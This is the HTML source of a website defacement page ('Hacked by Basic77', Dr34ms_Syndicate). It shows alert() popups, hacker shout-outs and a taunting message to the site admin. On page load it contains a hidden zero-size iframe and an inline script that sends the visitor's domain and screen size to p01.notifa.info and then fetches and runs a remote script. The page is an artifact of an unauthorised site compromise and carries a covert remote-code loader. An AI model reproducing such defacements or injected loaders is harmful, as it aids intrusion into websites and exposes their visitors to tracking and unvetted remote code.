
<br>



<br>



<!--  Sky-->
<script>alert ('Hacked! by Basic77 ')
    alert ('Beginner Role!  ')</script>
  
  
  <!--  Sky-->
  <script>alert ('Dr34ms_Syndicate ')</script 
  alert ('                           ' )</script>
  
<script src="https://cdn.rawgit.com/FicriPebriyana/efek/0a935a6c/efek%20salju.js" type="text/javascript"></script>


<!doctype html>



<html lang="en">



  <head>



    <title>Hacked by Basic77</title>



    <meta name="theme-color" content="black" />  



    <meta charset="utf-8">



    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no">



    <meta property="og:title" content="Dr34ms_Syndicate">



    <meta property="og:description" content="Secure your system"> 



    <meta name="viewport" content="width=device-width, initial-scale=1.0">



    <meta property="og:image" content=" https://i.ibb.co/7y15YrW/20211124-195242.png "> 



    <link rel="SHORTCUT ICON" href=" https://i.ibb.co/7y15YrW/20211124-195242.png ">



    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/css/bootstrap.min.css" integrity="sha384-PsH8R72JQ3SOdhVi3uxftmaW6Vc51MKb0q5P2rRUpPvrszuE4W1povHYgTpBfshb" crossorigin="anonymous"> 



    <link href="https://fonts.googleapis.com/css?family=Bahiana|Black+Ops+One|Josefin+Slab |New+Rocker|Quicksand|Wallpoet|orbitron" rel="stylesheet">



    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css"> 



<style>



 body {



    background-color:black;



    text-align:center;



	color: #fff;



	font-family:Times;



    position: center;



    width: 800px;



	font-size: 18px;



    margin: 0 auto;



    }



 .nick{



       animation: blink 5s infinite;



       font-family:Times;



       font-size:18px;



  }



  @keyframes blink{



         to{opacity: .0;}



   }



h2 {



 font-family:Times;



 color: #fff;



 }



 button {



    color: #fff;



    background: transparent linear-gradient(to right, #27c4f5, #a307ba, #fd8d32, #70c050, #27c4f5);



	background-size: 500% 500%;



	-webkit-animation: Gradient 15s ease infinite;



	-moz-animation: Gradient 15s ease infinite;



	animation: Gradient 15s ease infinite;



}







@-webkit-keyframes Gradient {



	0% {



		background-position: 0% 50%



	}



	50% {



		background-position: 100% 50%



	}



	100% {



		background-position: 0% 50%



	}



}







@-moz-keyframes Gradient {



	0% {



		background-position: 0% 50%



	}



	50% {



		background-position: 100% 50%



	}



	100% {



		background-position: 0% 50%



	}



}



@keyframes Gradient {



	0% {



		background-position: 0% 50%



	}



	50% {



		background-position: 100% 50%



	}



	100% {



		background-position: 0% 50%



	}



}



 



</style>



  </head>



  <body>



    <script type="text/javascript" src="http://htmlfreecodes.com/codes/rain.js"></script>



<body>

<iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay" src=" https://d.top4top.io/p_1921kshvc8.jpg " ></iframe><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncX0AGAZ9l0NcarmYe9no1%2b3YJ4YvIpG56keu%2bg5bpahbAtUPj6O1Z9X3QL1tm0AyZ8xbbZXKyKfTd602G0u3hvctBhTsahRyDxKknjNZUFUM1bHPvN96ZRzX%2fKbZkjn5HX6WKy92m0lQoa0pvvxLMImPsp%2fabC9lWzOkLF2NhUu%2bzP%2bDZjMHDUtkP4vQC22Nz0TTSJkMvFmdGgEDQSDb09Gcd%2fOWC0pyaWIl8al2x8BhmxOyUazsOYOw%2bdjfY%2bmbR55yn10G1ly%2bDODLYyia5HqaQxaXiPu6%2bGqdT9G41r2LrbU4jKsyDvSAGrZ6C%2fTrcen8ZpG8%2bAyJAF6dr2WvRFUX6EAo3anQunBQ%2bgPU5Rpq8vTqjp5q%2b1UjW%2fCdnhJRFIsiiqzceT7NjauW%2fgBDWkpNlGbcDE91%2f%2bBwE%2bkS8Sci5Lyp%2bMA7vybep%2bFG0mJtVtEqx6z%2b9woitfkaSzrSGhN6TfUs2nydvBRQNAirq9Be8rfXpLTC7zfU7t%2fRikWdekmtsmG2CTe0b6vTYIQ0QsAC7s5ORzvbACKusYdH07QyHloG0J31U611kMMO84go%2bAfEIJEy4t7pbJ0mapCsJf5rNV8B60y6mr" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>


<h4 id="h4"><br></h4>

<p class="style14" align="center"> <font color="#ffffff" face="courier new" size="6">Friends:</font><marquee scrolldelay="50" scrollamount="7" direction="left" behavior="scroll" width="70%">

<font color="red" face="Time" size="6"> ./M4SKMONEY7 || ./M4SKRIO || ./Bully X-ploit || HunterSec || LolZ666h05t_ || X10n_666h05t || Xrs_Hacker || Redz0ne || killerZ0ne || Sniper-Xploit || Vexa_host || Dr34ms_404 || VNcoder. || Bluehat777 || general_ghost404 || iCexSec || Xzarr._ || XFoksz404 || Xzyuba || Xonion00 || </font></marquee><br></p><p align="Times">

</div>


  </body>



  <center><img style="width:400px;" src="https://e.top4top.io/p_19369wc4d0.gif" ><br /></center>



      </div><br />




 <br>

 	<br>

<h4> <font color="red"> ♤ <font color="white"> Stamped! by Basic77<font color="red">  ♤</h4>
 <br>
 
   <br>
 
 <h4><font color="white">Dear Admin, I was just for fun hacking your site, try to fix your site again later :)


<h4><br><font color="white">Thanks To :

<br>

<font color="red">./M4SKMON3Y7<font color="red"> <font color="yellow"> <font color="purple">  <font color="white"> <font color="red"> <br>  <font color="white"> <font color="red"> ~ <font color="white">GanestSeven<font color="red"> <font color="white"><font color="red">~  <font color="white">  <font color="red"> <font color="white">  <font color="red"> <font color="white"> <font color="red"> <font color="white">JAWA TIMUR GHOST<font color="red"> ~ <font color="white"><font color="red"> <font color="white"> Dr34ms_Syndicate <font color="Red"> ~ <font color="white"> Indonesian Hacker Rulez<font colot="Red"> ~ <font color="white">PanglimaJateng<br>

<br>

<audio id="audioNotifikasi">
  <source src="https://j.top4top.io/m_1936mokgt0.mp3" type="audio/mpeg">
</audio>
<button style="border:2px solid green; border-radius:30px; background-color:purple;" onclick="playAudio()" type="button"><font face="monaco" size="3" color="white">Play Music</font></button>
<button style="border:2px solid green; border-radius:30px; background-color:purple;" onclick="pauseAudio()" type="button"><font face="monaco" size="3" color="white">Pause Music</font></button> <br>
<a href="https:/wa.me/+62895395384588?text=assalamualaikum"><button style="border:2px solid green; border-radius:30px; background-color:purple;"><font face="monaco" size="3" color="white">Contact Me</font></button></a>
<script type="text/javascript">
var el = document.getElementById("audioNotifikasi"); 
function playAudio() { 
  el.play(); 
} 
function pauseAudio() { 
  el.pause(); 
} 
</script>
<br>
	    <div id="jam">
       6:23:17
      </div>
     </center> 
</style> 
  <script type="text/javascript">
// 1 detik = 1000
window.setTimeout("waktu()",1000);  
function waktu() {   
var tanggal = new Date();  
setTimeout("waktu()",1000);  
document.getElementById("jam").innerHTML = tanggal.getHours()+":"+tanggal.getMinutes()+":"+tanggal.getSeconds();
}
</script> 
 </head> 
 <body> 
  <br> 
  	</script> <script type="text/javascript">
  
  var months = ['Januari', 'Februari', 'Maret', 'April', 'Mei', 'Juni', 'Juli', 'Agustus', 'September', 'Oktober', 'November', 'Desember'];
  var myDays = ['Minggu', 'Senin', 'Selasa', 'Rabu', 'Kamis', 'Jum&#39;at', 'Sabtu'];
  var date = new Date();
  var day = date.getDate();
  var month = date.getMonth();
  var thisDay = date.getDay(),
  thisDay = myDays[thisDay];
  var yy = date.getYear();
  var year = (yy < 1000) ? yy + 1900 : yy;
  document.write(thisDay + ', ' + day + ' ' + months[month] + ' ' + year);
  
  </script> </font> 
    </center> 
    <!----> 
    	
